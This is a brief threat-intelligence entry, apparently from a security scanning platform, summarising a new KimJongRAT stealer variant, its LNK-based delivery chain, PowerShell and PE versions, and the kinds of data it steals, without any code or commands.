The Reveal Platform
Intel Name: Exploring a new kimjongrat stealer variant and its powershell implementation
Date of Scan: June 18, 2025
Impact: High
Summary: KimJongRAT, first identified in 2013, now appears in two variants: a Portable Executable (PE) and a PowerShell version. Both are triggered via a malicious LNK file that fetches droppers from a CDN. The PE dropper delivers a loader, decoy PDF, and text file, while the PowerShell variant unpacks a PDF and ZIP archive containing the stealer and keylogger. Both variants exfiltrate browser, crypto-wallet, and system data to an attacker-controlled server.
